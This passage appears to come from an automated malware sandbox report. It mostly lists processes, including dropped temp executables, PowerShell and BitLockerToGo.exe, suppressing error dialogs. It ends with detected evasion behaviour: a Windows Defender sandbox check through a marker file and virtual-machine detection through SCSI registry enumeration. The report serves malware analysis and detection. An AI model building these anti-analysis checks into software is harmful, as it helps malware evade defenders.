                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\60FC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Check for Windows Defender sandbox
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeFile Queried: C:\INTERNAL\__emptyJump to behavior
                  Checks if the current machine is a virtual machine (disk enumeration)
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
